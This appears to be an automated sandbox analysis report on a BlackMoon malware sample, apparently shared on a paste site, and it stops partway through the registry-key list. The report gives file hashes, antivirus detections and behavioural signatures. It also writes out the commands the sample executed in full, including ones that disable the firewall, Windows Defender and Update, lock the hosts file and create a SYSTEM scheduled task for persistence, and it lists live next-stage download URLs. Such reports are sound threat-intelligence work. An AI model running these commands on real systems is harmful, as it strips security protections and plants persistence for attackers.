· 6 years ago · Oct 18, 2019, 02:12 PM
1
2* ID: 5936
3* MalFamily: "BlackMoon"
4
5* MalScore: 10.0
6
7* File Name: "Exes_d63f49973284b14a0eecc00e8ec1bc42.exe"
8* File Size: 5674496
9* File Type: "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed"
10* SHA256: "7191c50d9ce73f560bc0c858e389deebeaf8ad87acd3800268708c7eaa6e3fcd"
11* MD5: "d63f49973284b14a0eecc00e8ec1bc42"
12* SHA1: "31c716f4fb5badc1cada2b29e706e9473d23efe4"
13* SHA512: "b76f22c91c32ab23a0e6ac4788dd1571c6a6c54af04331ce19aa4cc857a8715c16ba1d2d892c059c0a47e7ccea76414e18e6fcf788b47892455f59ed9d3ea591"
14* CRC32: "E35A8275"
15* SSDEEP: "98304:LzJ9Q7DjJMHgm3bAZdYetOOSVBMCcmvHEVfDX8vb1OFWeK2JE+24VU554fZjEUMz:LLQ7Dj8ZcEcOhmYBOFWeKtLp54BoUfZI"
16
17* Process Execution:
18 "3cCNvvAhkAztO.exe",
19 "cmd.exe",
20 "PING.EXE",
21 "bmrtbgt.exe",
22 "services.exe",
23 "bmrtbgt.exe",
24 "nqecnaywtfdomyw18026.exe",
25 "cmd.exe",
26 "cmd.exe",
27 "cacls.exe",
28 "cmd.exe",
29 "cacls.exe",
30 "cmd.exe",
31 "cacls.exe",
32 "netsh.exe",
33 "netsh.exe",
34 "netsh.exe",
35 "cmd.exe",
36 "cmd.exe",
37 "schtasks.exe",
38 "netsh.exe",
39 "netsh.exe",
40 "netsh.exe",
41 "netsh.exe",
42 "netsh.exe",
43 "netsh.exe",
44 "netsh.exe",
45 "netsh.exe",
46 "netsh.exe",
47 "netsh.exe",
48 "netsh.exe",
49 "netsh.exe",
50 "cmd.exe",
51 "net.exe",
52 "net1.exe",
53 "cmd.exe",
54 "netsh.exe",
55 "cmd.exe",
56 "netsh.exe",
57 "cmd.exe",
58 "net.exe",
59 "net1.exe",
60 "cmd.exe",
61 "net.exe",
62 "net1.exe",
63 "cmd.exe",
64 "net.exe",
65 "net1.exe",
66 "cmd.exe",
67 "sc.exe",
68 "cmd.exe",
69 "sc.exe",
70 "cmd.exe",
71 "svchost.exe",
72 "svchost.exe",
73 "WmiApSrv.exe",
74 "svchost.exe",
75 "WerFault.exe",
76 "WerFault.exe",
77 "wermgr.exe",
78 "svchost.exe",
79 "svchost.exe",
80 "WmiPrvSE.exe"
81
82
83* Executed Commands:
84 "cmd /c ping 127.0.0.1 -n 5 & Start C:\\Windows\\crbuqquc\\bmrtbgt.exe",
85 "C:\\Windows\\system32\\PING.EXE ping 127.0.0.1 -n 5",
86 "C:\\Windows\\crbuqquc\\bmrtbgt.exe",
87 "C:\\Windows\\system32\\svchost.exe -k NetworkServiceNetworkRestricted",
88 "C:\\Windows\\system32\\wbem\\WmiApSrv.exe",
89 "C:\\Windows\\System32\\svchost.exe -k WerSvcGroup",
90 "C:\\Windows\\system32\\svchost.exe -k netsvcs",
91 "C:\\Windows\\crbuqquc\\nqecnaywtfdomyw18026.exe",
92 "cmd /c echo Y|cacls C:\\Windows\\system32\\drivers\\etc\\hosts /T /D users & echo Y|cacls C:\\Windows\\system32\\drivers\\etc\\hosts /T /D administrators & echo Y|cacls C:\\Windows\\system32\\drivers\\etc\\hosts /T /D SYSTEM",
93 "netsh ipsec static delete all",
94 "netsh ipsec static add policy name=Bastards description=FuckingBastards",
95 "netsh ipsec static add filteraction name=BastardsList action=block",
96 "cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn \"ujqftiylp\" /ru system /tr \"cmd /c C:\\Windows\\Fonts\\bmrtbgt.exe\"",
97 "netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP",
98 "netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP",
99 "netsh ipsec static add rule name=FuckingBastards policy=Bastards filterlist=BastardsList filteraction=BastardsList",
100 "netsh ipsec static set policy name=Bastards assign=y",
101 "netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP",
102 "netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP",
103 "netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP",
104 "netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP",
105 "cmd /c net stop SharedAccess",
106 "cmd /c netsh firewall set opmode mode=disable",
107 "cmd /c netsh Advfirewall set allprofiles state off",
108 "cmd /c net stop MpsSvc",
109 "cmd /c net stop WinDefend",
110 "cmd /c net stop wuauserv",
111 "cmd /c sc config MpsSvc start= disabled",
112 "cmd /c sc config SharedAccess start= disabled",
113 "cmd /c sc config WinDefend start= disabled",
114 "cmd /c sc config wuauserv start= disabled",
115 "C:\\Windows\\system32\\cmd.exe /S /D /c\" echo Y\"",
116 "cacls C:\\Windows\\system32\\drivers\\etc\\hosts /T /D users",
117 "cacls C:\\Windows\\system32\\drivers\\etc\\hosts /T /D administrators",
118 "cacls C:\\Windows\\system32\\drivers\\etc\\hosts /T /D SYSTEM",
119 "schtasks /create /sc minute /mo 1 /tn \"ujqftiylp\" /ru system /tr \"cmd /c C:\\Windows\\Fonts\\bmrtbgt.exe\"",
120 "C:\\Windows\\system32\\WerFault.exe -u -p 2480 -s 1200",
121 "C:\\Windows\\system32\\WerFault.exe -u -p 2480 -s 1204",
122 "\"C:\\Windows\\system32\\wermgr.exe\" \"-queuereporting_svc\" \"C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_wmiprvse.exe_548ba4ac92e4eee4a48cdad23d45ab0c2171_cab_06c4201c\"",
123 "net stop SharedAccess",
124 "netsh firewall set opmode mode=disable",
125 "C:\\Windows\\system32\\net1 stop SharedAccess",
126 "netsh Advfirewall set allprofiles state off",
127 "net stop MpsSvc",
128 "net stop WinDefend",
129 "net stop wuauserv",
130 "C:\\Windows\\system32\\net1 stop MpsSvc",
131 "C:\\Windows\\system32\\net1 stop WinDefend",
132 "sc config MpsSvc start= disabled",
133 "C:\\Windows\\system32\\net1 stop wuauserv",
134 "sc config SharedAccess start= disabled",
135 "sc config WinDefend start= disabled"
136
137
138* Signatures Detected:
139
140 "Description": "SetUnhandledExceptionFilter detected (possible anti-debug)",
141 "Details":
142
143
144 "Description": "At least one process apparently crashed during execution",
145 "Details":
146
147
148 "Description": "Scheduled file move on reboot detected",
149 "Details":
150
151 "File Move on Reboot": "Old: C:\\Users\\user\\AppData\\Local\\Temp\\3cCNvvAhkAztO.exe -> New: C:\\Users\\user\\AppData\\Local\\Temp\\17911406\\....\\TemporaryFile"
152
153
154 "File Move on Reboot": "Old: C:\\Users\\user\\AppData\\Local\\Temp\\17911406\\....\\ -> New: C:\\Users\\user\\AppData\\Local\\Temp\\17911406\\TemporaryFile"
155
156
157 "File Move on Reboot": "Old: C:\\Windows\\crbuqquc\\nqecnaywtfdomyw18026.exe -> New: C:\\Windows\\Temp\\17918640\\....\\TemporaryFile"
158
159
160 "File Move on Reboot": "Old: C:\\Windows\\Temp\\17918640\\....\\ -> New: C:\\Windows\\Temp\\17918640\\TemporaryFile"
161
162
163 "File Move on Reboot": "Old: C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_wmiprvse.exe_548ba4ac92e4eee4a48cdad23d45ab0c2171_cab_06c4201c\\Report.wer.tmp -> New: C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_wmiprvse.exe_548ba4ac92e4eee4a48cdad23d45ab0c2171_cab_06c4201c\\Report.wer"
164
165
166
167
168 "Description": "Possible date expiration check, exits too soon after checking local time",
169 "Details":
170
171 "process": "cmd.exe, PID 2252"
172
173
174
175
176 "Description": "Anomalous file deletion behavior detected (10+)",
177 "Details":
178
179 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\17911406\\TemporaryFile\\TemporaryFile"
180
181
182 "DeletedFile": "C:\\Windows\\Temp\\17918640\\TemporaryFile\\TemporaryFile"
183
184
185 "DeletedFile": "C:\\Windows\\Tasks\\ujqftiylp.job"
186
187
188 "DeletedFile": "C:\\Windows\\SoftwareDistribution\\DataStore\\Logs\\edbtmp.log"
189
190
191 "DeletedFile": "C:\\Windows\\sysnative\\Tasks\\Microsoft\\Windows Defender\\MP Scheduled Scan"
192
193
194 "DeletedFile": "C:\\Windows\\sysnative\\Tasks\\Microsoft\\Windows Defender\\MpIdleTask"
195
196
197 "DeletedFile": "C:\\Windows\\Temp\\WER2667.tmp"
198
199
200 "DeletedFile": "C:\\Windows\\Temp\\WER2667.tmp.appcompat.txt"
201
202
203 "DeletedFile": "C:\\Windows\\Temp\\WER2667.tmp.appcompat.txt"
204
205
206 "DeletedFile": "C:\\Windows\\Temp\\WER70DF.tmp"
207
208
209 "DeletedFile": "C:\\Windows\\Temp\\WER70DF.tmp.WERInternalMetadata.xml"
210
211
212 "DeletedFile": "C:\\Windows\\Temp\\WER7842.tmp"
213
214
215 "DeletedFile": "C:\\Windows\\Temp\\WER7842.tmp.WERDataCollectionFailure.txt"
216
217
218 "DeletedFile": "C:\\Windows\\Temp\\WER2667.tmp.appcompat.txt"
219
220
221 "DeletedFile": "C:\\Windows\\Temp\\WER70DF.tmp.WERInternalMetadata.xml"
222
223
224 "DeletedFile": "C:\\Windows\\Temp\\WER7842.tmp.WERDataCollectionFailure.txt"
225
226
227
228
229 "Description": "Guard pages use detected - possible anti-debugging.",
230 "Details":
231
232
233 "Description": "A process attempted to delay the analysis task.",
234 "Details":
235
236 "Process": "netsh.exe tried to sleep 1060 seconds, actually delayed analysis time by 0 seconds"
237
238
239
240
241 "Description": "Performs HTTP requests potentially not found in PCAP.",
242 "Details":
243
244 "url_ioc": "aj.0x0x0x0x0.best:63145//cfg.ini"
245
246
247 "url_ioc": "xs.0x0x0x0x0.club:63145//cfg.ini"
248
249
250 "url_ioc": "ui.0x0x0x0x0.xyz:63145//cfg.ini"
251
252
253 "url_ioc": "qb.1c1c1c1c.best:63145//cfg.ini"
254
255
256
257
258 "Description": "Starts servers listening on 0.0.0.0:0, :0",
259 "Details":
260
261
262 "Description": "Repeatedly searches for a not-found process, may want to run with startbrowser=1 option",
263 "Details":
264
265
266 "Description": "Drops a binary and executes it",
267 "Details":
268
269 "binary": "C:\\Windows\\crbuqquc\\bmrtbgt.exe"
270
271
272 "binary": "C:\\Windows\\crbuqquc\\bmrtbgt.exe"
273
274
275 "binary": "C:\\Windows\\crbuqquc\\nqecnaywtfdomyw18026.exe"
276
277
278
279
280 "Description": "The binary likely contains encrypted or compressed data.",
281 "Details":
282
283 "section": "name: UPX1, entropy: 7.80, characteristics: IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE, raw_size: 0x00568e00, virtual_size: 0x00569000"
284
285
286
287
288 "Description": "The executable is compressed using UPX",
289 "Details":
290
291 "section": "name: UPX0, entropy: 0.00, characteristics: IMAGE_SCN_CNT_UNINITIALIZED_DATA|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE, raw_size: 0x00000000, virtual_size: 0x00153000"
292
293
294
295
296 "Description": "A ping command was executed with the -n argument possibly to delay analysis",
297 "Details":
298
299 "command": "cmd /c ping 127.0.0.1 -n 5 & Start C:\\Windows\\crbuqquc\\bmrtbgt.exe"
300
301
302 "command": "C:\\Windows\\system32\\PING.EXE ping 127.0.0.1 -n 5"
303
304
305
306
307 "Description": "Uses Windows utilities for basic functionality",
308 "Details":
309
310 "command": "cmd /c ping 127.0.0.1 -n 5 & Start C:\\Windows\\crbuqquc\\bmrtbgt.exe"
311
312
313 "command": "cmd /c ping 127.0.0.1 -n 5 & Start C:\\Windows\\crbuqquc\\bmrtbgt.exe"
314
315
316 "command": "C:\\Windows\\system32\\PING.EXE ping 127.0.0.1 -n 5"
317
318
319 "command": "cmd /c echo Y|cacls C:\\Windows\\system32\\drivers\\etc\\hosts /T /D users & echo Y|cacls C:\\Windows\\system32\\drivers\\etc\\hosts /T /D administrators & echo Y|cacls C:\\Windows\\system32\\drivers\\etc\\hosts /T /D SYSTEM"
320
321
322 "command": "netsh ipsec static delete all"
323
324
325 "command": "netsh ipsec static add policy name=Bastards description=FuckingBastards"
326
327
328 "command": "netsh ipsec static add filteraction name=BastardsList action=block"
329
330
331 "command": "cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn \"ujqftiylp\" /ru system /tr \"cmd /c C:\\Windows\\Fonts\\bmrtbgt.exe\""
332
333
334 "command": "cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn \"ujqftiylp\" /ru system /tr \"cmd /c C:\\Windows\\Fonts\\bmrtbgt.exe\""
335
336
337 "command": "cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn \"ujqftiylp\" /ru system /tr \"cmd /c C:\\Windows\\Fonts\\bmrtbgt.exe\""
338
339
340 "command": "netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP"
341
342
343 "command": "netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP"
344
345
346 "command": "netsh ipsec static add rule name=FuckingBastards policy=Bastards filterlist=BastardsList filteraction=BastardsList"
347
348
349 "command": "netsh ipsec static set policy name=Bastards assign=y"
350
351
352 "command": "netsh ipsec static set policy name=Bastards assign=y"
353
354
355 "command": "netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP"
356
357
358 "command": "netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP"
359
360
361 "command": "netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP"
362
363
364 "command": "netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP"
365
366
367 "command": "cmd /c net stop SharedAccess"
368
369
370 "command": "cmd /c net stop SharedAccess"
371
372
373 "command": "cmd /c netsh firewall set opmode mode=disable"
374
375
376 "command": "cmd /c netsh firewall set opmode mode=disable"
377
378
379 "command": "cmd /c netsh firewall set opmode mode=disable"
380
381
382 "command": "cmd /c netsh Advfirewall set allprofiles state off"
383
384
385 "command": "cmd /c netsh Advfirewall set allprofiles state off"
386
387
388 "command": "cmd /c netsh Advfirewall set allprofiles state off"
389
390
391 "command": "cmd /c net stop MpsSvc"
392
393
394 "command": "cmd /c net stop MpsSvc"
395
396
397 "command": "cmd /c net stop WinDefend"
398
399
400 "command": "cmd /c net stop WinDefend"
401
402
403 "command": "cmd /c net stop wuauserv"
404
405
406 "command": "cmd /c net stop wuauserv"
407
408
409 "command": "cmd /c sc config MpsSvc start= disabled"
410
411
412 "command": "cmd /c sc config MpsSvc start= disabled"
413
414
415 "command": "cmd /c sc config SharedAccess start= disabled"
416
417
418 "command": "cmd /c sc config SharedAccess start= disabled"
419
420
421 "command": "cmd /c sc config WinDefend start= disabled"
422
423
424 "command": "cmd /c sc config WinDefend start= disabled"
425
426
427 "command": "cmd /c sc config wuauserv start= disabled"
428
429
430 "command": "cmd /c sc config wuauserv start= disabled"
431
432
433 "command": "C:\\Windows\\system32\\cmd.exe /S /D /c\" echo Y\""
434
435
436 "command": "schtasks /create /sc minute /mo 1 /tn \"ujqftiylp\" /ru system /tr \"cmd /c C:\\Windows\\Fonts\\bmrtbgt.exe\""
437
438
439 "command": "schtasks /create /sc minute /mo 1 /tn \"ujqftiylp\" /ru system /tr \"cmd /c C:\\Windows\\Fonts\\bmrtbgt.exe\""
440
441
442 "command": "schtasks /create /sc minute /mo 1 /tn \"ujqftiylp\" /ru system /tr \"cmd /c C:\\Windows\\Fonts\\bmrtbgt.exe\""
443
444
445 "command": "net stop SharedAccess"
446
447
448 "command": "netsh firewall set opmode mode=disable"
449
450
451 "command": "netsh firewall set opmode mode=disable"
452
453
454 "command": "netsh Advfirewall set allprofiles state off"
455
456
457 "command": "netsh Advfirewall set allprofiles state off"
458
459
460 "command": "net stop MpsSvc"
461
462
463 "command": "net stop WinDefend"
464
465
466 "command": "net stop wuauserv"
467
468
469 "command": "sc config MpsSvc start= disabled"
470
471
472 "command": "sc config SharedAccess start= disabled"
473
474
475 "command": "sc config WinDefend start= disabled"
476
477
478
479
480 "Description": "Deletes its original binary from disk",
481 "Details":
482
483
484 "Description": "Behavioural detection: Transacted Hollowing",
485 "Details":
486
487
488 "Description": "Attempts to stop active services",
489 "Details":
490
491 "servicename": "MPSSVC"
492
493
494 "servicename": "WINDEFEND"
495
496
497 "servicename": "WUAUSERV"
498
499
500
501
502 "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time",
503 "Details":
504
505 "Spam": "services.exe (504) called API GetSystemTimeAsFileTime 9465367 times"
506
507
508
509
510 "Description": "Behavior consistent with a dropper attempting to download the next stage.",
511 "Details":
512
513 "File": "/cfg.ini was requested from hosts: aj.0x0x0x0x0.best, xs.0x0x0x0x0.club, ui.0x0x0x0x0.xyz, qb.1c1c1c1c.best"
514
515
516
517
518 "Description": "Attempts to execute a Living Off The Land Binary command for post exeploitation",
519 "Details":
520
521 "MITRE T1078 - schtask": "(Tactic: Execution, Persistence, Privilege Escalation)"
522
523
524
525
526 "Description": "Installs itself for autorun at Windows startup",
527 "Details":
528
529 "service name": "pmtypkytl"
530
531
532 "service path": "C:\\Windows\\crbuqquc\\bmrtbgt.exe"
533
534
535 "key": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\netsh.exe\\Debugger"
536
537
538 "data": "C:\\Windows\\system32\\svchost.exe"
539
540
541 "key": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\schtasks.exe\\Debugger"
542
543
544 "data": "C:\\Windows\\system32\\svchost.exe"
545
546
547 "key": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\at.exe\\Debugger"
548
549
550 "data": "C:\\Windows\\system32\\svchost.exe"
551
552
553 "key": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\cacls.exe\\Debugger"
554
555
556 "data": "C:\\Windows\\system32\\svchost.exe"
557
558
559 "task": "cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn \"ujqftiylp\" /ru system /tr \"cmd /c C:\\Windows\\Fonts\\bmrtbgt.exe\""
560
561
562
563
564 "Description": "File has been identified by 56 Antiviruses on VirusTotal as malicious",
565 "Details":
566
567 "MicroWorld-eScan": "Generic.Backdoor.Torr.22F25429"
568
569
570 "FireEye": "Generic.mg.d63f49973284b14a"
571
572
573 "CAT-QuickHeal": "Trojanpws.Qqpass.16554"
574
575
576 "McAfee": "Artemis!D63F49973284"
577
578
579 "Cylance": "Unsafe"
580
581
582 "VIPRE": "Trojan.Win32.Generic!BT"
583
584
585 "K7AntiVirus": "Adware ( 005070c51 )"
586
587
588 "Alibaba": "VirTool:Win32/CeeInject.497cc0bc"
589
590
591 "K7GW": "Adware ( 005070c51 )"
592
593
594 "Cybereason": "malicious.73284b"
595
596
597 "Arcabit": "Generic.Backdoor.Torr.22F25429"
598
599
600 "Invincea": "heuristic"
601
602
603 "Symantec": "Trojan.Gen.MBT"
604
605
606 "APEX": "Malicious"
607
608
609 "ClamAV": "Win.Trojan.BlackMoon-7136668-0"
610
611
612 "Kaspersky": "HEUR:Trojan.Win32.Generic"
613
614
615 "BitDefender": "Generic.Backdoor.Torr.22F25429"
616
617
618 "NANO-Antivirus": "Trojan.Win32.MS17010.gcobuw"
619
620
621 "AegisLab": "Trojan.Win32.Generic.4!c"
622
623
624 "Avast": "Win32:Malware-gen"
625
626
627 "Ad-Aware": "Generic.Backdoor.Torr.22F25429"
628
629
630 "Sophos": "Generic PUA DB (PUA)"
631
632
633 "Comodo": "Packed.Win32.MUPX.Gen@24tbus"
634
635
636 "F-Secure": "Heuristic.HEUR/AGEN.1014775"
637
638
639 "DrWeb": "Trojan.Hosts.46779"
640
641
642 "Zillya": "Trojan.Generic.Win32.955214"
643
644
645 "TrendMicro": "TROJ_GEN.R002C0WJ319"
646
647
648 "McAfee-GW-Edition": "BehavesLike.Win32.Injector.tc"
649
650
651 "Emsisoft": "Generic.Backdoor.Torr.22F25429 (B)"
652
653
654 "SentinelOne": "DFI - Malicious PE"
655
656
657 "Cyren": "W32/Kryptik.AHP.gen!Eldorado"
658
659
660 "Webroot": "W32.Malware.Gen"
661
662
663 "Avira": "HEUR/AGEN.1014775"
664
665
666 "Antiy-AVL": "HackTool/Win64.Mimikatz.a"
667
668
669 "Microsoft": "Trojan:Win32/Dynamer!rfn"
670
671
672 "Endgame": "malicious (moderate confidence)"
673
674
675 "ZoneAlarm": "HEUR:Trojan.Win32.Generic"
676
677
678 "GData": "Win32.Trojan.Agent.WP"
679
680
681 "AhnLab-V3": "Malware/Win32.Generic.C3367812"
682
683
684 "Acronis": "suspicious"
685
686
687 "VBA32": "BScope.Trojan.Occamy"
688
689
690 "ALYac": "Generic.Backdoor.Torr.22F25429"
691
692
693 "MAX": "malware (ai score=85)"
694
695
696 "Malwarebytes": "RiskWare.BlackMoon.UPX"
697
698
699 "ESET-NOD32": "a variant of Win32/Packed.BlackMoon.A potentially unwanted"
700
701
702 "TrendMicro-HouseCall": "TROJ_GEN.R002C0WJ319"
703
704
705 "Rising": "Trojan.Downloader!1.B837 (TFE:5:AvnUCUT9PKC)"
706
707
708 "Yandex": "Trojan.Agent!B7b1rLf/4AM"
709
710
711 "Ikarus": "Trojan-PSW.QQpass"
712
713
714 "eGambit": "hacktool.mimikatz"
715
716
717 "Fortinet": "W32/Kryptik.AHP!tr"
718
719
720 "MaxSecure": "Trojan.Malware.300983.susgen"
721
722
723 "AVG": "FileRepMalware"
724
725
726 "Panda": "Trj/Genetic.gen"
727
728
729 "CrowdStrike": "win/malicious_confidence_90% (W)"
730
731
732 "Qihoo-360": "HEUR/QVM11.1.4D0D.Malware.Gen"
733
734
735
736
737 "Description": "Checks the system manufacturer, likely for anti-virtualization",
738 "Details":
739
740
741 "Description": "Clamav Hits in Target/Dropped/SuriExtracted",
742 "Details":
743
744 "target": "clamav:Win.Trojan.BlackMoon-7136668-0, sha256:7191c50d9ce73f560bc0c858e389deebeaf8ad87acd3800268708c7eaa6e3fcd, type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed"
745
746
747 "dropped": "clamav:Win.Trojan.BlackMoon-7136668-0, sha256:7191c50d9ce73f560bc0c858e389deebeaf8ad87acd3800268708c7eaa6e3fcd , guest_paths:C:\\Windows\\crbuqquc\\bmrtbgt.exe*C:\\Users\\user\\AppData\\Local\\Temp\\17911406\\....\\TemporaryFile, type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed"
748
749
750 "dropped": "clamav:Win.Trojan.BlackMoon-7136668-0, sha256:8b668cb3af54aa46714a92d31e5e189b96ddda5bd3fdb98dc567e3c3f40fba83 , guest_paths:C:\\Windows\\crbuqquc\\bmrtbgt.exe*C:\\Windows\\Fonts\\bmrtbgt.exe, type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed"
751
752
753
754
755 "Description": "Creates a copy of itself",
756 "Details":
757
758 "copy": "C:\\Windows\\crbuqquc\\bmrtbgt.exe"
759
760
761 "copy": "C:\\Users\\user\\AppData\\Local\\Temp\\17911406\\....\\TemporaryFile"
762
763
764
765
766 "Description": "The sample wrote data to the system hosts file.",
767 "Details":
768
769
770 "Description": "Collects information to fingerprint the system",
771 "Details":
772
773
774 "Description": "Uses suspicious command line tools or Windows utilities",
775 "Details":
776
777 "command": "cmd /c echo Y|cacls C:\\Windows\\system32\\drivers\\etc\\hosts /T /D users & echo Y|cacls C:\\Windows\\system32\\drivers\\etc\\hosts /T /D administrators & echo Y|cacls C:\\Windows\\system32\\drivers\\etc\\hosts /T /D SYSTEM"
778
779
780 "command": "cacls C:\\Windows\\system32\\drivers\\etc\\hosts /T /D users"
781
782
783 "command": "cacls C:\\Windows\\system32\\drivers\\etc\\hosts /T /D administrators"
784
785
786 "command": "cacls C:\\Windows\\system32\\drivers\\etc\\hosts /T /D SYSTEM"
787
788
789
790
791
792* Started Service:
793 "pmtypkytl",
794 "WerSvc",
795 "IKEEXT",
796 "PolicyAgent",
797 "wmiApSrv"
798
799
800* Mutexes:
801 "RasPbFile",
802 "IESQMMUTEX_0_208",
803 "Global\\RefreshRA_Mutex_Lib",
804 "Global\\RefreshRA_Mutex",
805 "Global\\RefreshRA_Mutex_Flag",
806 "Global\\WmiApSrv",
807 "Local\\WERReportingForProcess2480",
808 "Global\\\\xe5\\x88\\x90\\xc8\\x93",
809 "DBWinMutex",
810 "Global\\\\xee\\xbb\\xb0\\xcd\\x96",
811 "WERUI_APPCRASH-548ba4ac92e4eee4a48cdad23d45ab0c2171"
812
813
814* Modified Files:
815 "C:\\Windows\\crbuqquc\\bmrtbgt.exe",
816 "C:\\Users\\user\\AppData\\Local\\Temp\\17911406\\....\\TemporaryFile",
817 "C:\\Users\\user\\AppData\\Local\\Temp\\17911406\\TemporaryFile",
818 "C:\\Windows\\crbuqquc\\nqecnaywtfdomyw18026.exe",
819 "C:\\Windows\\System32\\drivers\\etc\\hosts",
820 "C:\\Windows\\Temp\\kcrlpplil\\grltlilub.exe",
821 "C:\\Windows\\Fonts\\bmrtbgt.exe",
822 "C:\\Windows\\Temp\\17918640\\....\\TemporaryFile",
823 "C:\\Windows\\Temp\\17918640\\TemporaryFile",
824 "\\Device\\NamedPipe",
825 "\\Device\\Http\\Communication",
826 "C:\\Windows\\appcompat\\Programs\\RecentFileCache.bcf",
827 "C:\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb",
828 "C:\\Windows\\SoftwareDistribution\\DataStore\\Logs\\edb.chk",
829 "\\??\\WMIDataDevice",
830 "\\??\\PIPE\\samr",
831 "C:\\Windows\\sysnative\\wbem\\repository\\WRITABLE.TST",
832 "C:\\Windows\\sysnative\\wbem\\repository\\MAPPING1.MAP",
833 "C:\\Windows\\sysnative\\wbem\\repository\\MAPPING2.MAP",
834 "C:\\Windows\\sysnative\\wbem\\repository\\MAPPING3.MAP",
835 "C:\\Windows\\sysnative\\wbem\\repository\\OBJECTS.DATA",
836 "C:\\Windows\\sysnative\\wbem\\repository\\INDEX.BTR",
837 "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2WMI SELF-INSTRUMENTATION EVENT PROVIDER",
838 "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2PROVIDERSUBSYSTEM",
839 "C:\\Windows\\Temp\\WER2667.tmp.appcompat.txt",
840 "C:\\Windows\\Temp\\WER70DF.tmp.WERInternalMetadata.xml",
841 "C:\\Windows\\Temp\\WER7842.tmp.WERDataCollectionFailure.txt",
842 "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_wmiprvse.exe_548ba4ac92e4eee4a48cdad23d45ab0c2171_cab_06c4201c\\WER2667.tmp.appcompat.txt",
843 "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_wmiprvse.exe_548ba4ac92e4eee4a48cdad23d45ab0c2171_cab_06c4201c\\WER70DF.tmp.WERInternalMetadata.xml",
844 "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_wmiprvse.exe_548ba4ac92e4eee4a48cdad23d45ab0c2171_cab_06c4201c\\WER7842.tmp.WERDataCollectionFailure.txt",
845 "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_wmiprvse.exe_548ba4ac92e4eee4a48cdad23d45ab0c2171_cab_06c4201c\\Report.wer",
846 "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_wmiprvse.exe_548ba4ac92e4eee4a48cdad23d45ab0c2171_cab_06c4201c\\Report.wer.tmp"
847
848
849* Deleted Files:
850 "C:\\Users\\user\\AppData\\Local\\Temp\\3cCNvvAhkAztO.exe",
851 "C:\\Users\\user\\AppData\\Local\\Temp\\17911406\\....\\",
852 "C:\\Users\\user\\AppData\\Local\\Temp\\17911406\\TemporaryFile\\TemporaryFile",
853 "C:\\Windows\\crbuqquc\\nqecnaywtfdomyw18026.exe",
854 "C:\\Windows\\Temp\\17918640\\....\\",
855 "C:\\Windows\\Temp\\17918640\\TemporaryFile\\TemporaryFile",
856 "C:\\Windows\\Tasks\\ujqftiylp.job",
857 "C:\\Windows\\SoftwareDistribution\\DataStore\\Logs\\edbtmp.log",
858 "C:\\Windows\\sysnative\\Tasks\\Microsoft\\Windows Defender\\MP Scheduled Scan",
859 "C:\\Windows\\sysnative\\Tasks\\Microsoft\\Windows Defender\\MpIdleTask",
860 "C:\\Windows\\Temp\\WER2667.tmp",
861 "C:\\Windows\\Temp\\WER2667.tmp.appcompat.txt",
862 "C:\\Windows\\Temp\\WER70DF.tmp",
863 "C:\\Windows\\Temp\\WER70DF.tmp.WERInternalMetadata.xml",
864 "C:\\Windows\\Temp\\WER7842.tmp",
865 "C:\\Windows\\Temp\\WER7842.tmp.WERDataCollectionFailure.txt",
866 "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_wmiprvse.exe_548ba4ac92e4eee4a48cdad23d45ab0c2171_cab_06c4201c\\Report.wer.tmp"
867
868
869* Modified Registry Keys:
870 "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\PolicyAgent\\Type",
